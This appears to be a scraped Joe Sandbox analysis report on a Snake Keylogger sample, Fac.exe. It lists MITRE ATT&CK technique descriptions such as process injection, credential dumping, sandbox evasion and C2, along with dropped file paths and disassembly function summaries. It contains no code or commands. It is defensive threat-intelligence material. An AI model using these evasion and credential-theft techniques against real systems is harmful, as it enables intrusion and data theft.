Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fac.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsr797A.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Faaborgs\kvaksalvere.res

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Faaborgs\ters.gra

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Inhomogenitet.Udg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\autotypes.ome

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\fonta.jpg

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
Fac.exe

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 004057BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405DA9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 7017177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre